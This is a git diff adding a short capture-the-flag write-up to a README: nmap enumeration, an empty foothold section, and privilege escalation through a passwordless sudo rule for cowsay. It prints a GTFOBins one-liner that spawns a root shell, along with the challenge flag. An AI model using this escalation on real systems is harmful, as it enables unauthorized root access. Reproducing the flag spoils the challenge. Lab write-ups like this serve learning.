README.md

@@ -7,8 +7,46 @@
 
 ## Writeup
 
-
+### Enum
-
+
+Scan the IP using nmap for open ports
+
+```
+nmap -p- ip
+```
+
+The port 22 and 31337 are open.
+
+We find that there is a web service on port 31337.
+
+### Foothold
+
+...
+
+### Privesc
+
+We can see that the user is allowed tu run `/usr/games/cowsay` as root using sudo without password.
+
+```
+User l33t may run the following commands on srv1prod:
+    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
+```
+
+Using gtfo bins, we identified that we can spawn a root shell thanks to this misconfiguration.
+
+[https://gtfobins.github.io/gtfobins/cowsay/](https://gtfobins.github.io/gtfobins/cowsay/)
+
+```
+TF=$(mktemp)
+echo 'exec "/bin/sh";' >$TF
+sudo cowsay -f $TF x
+# id
+uid=0(root) gid=0(root) groups=0(root)
+# cat /root/root.txt
+epita{th3-sup3r-c0ws4y}
+```
+
+Solved !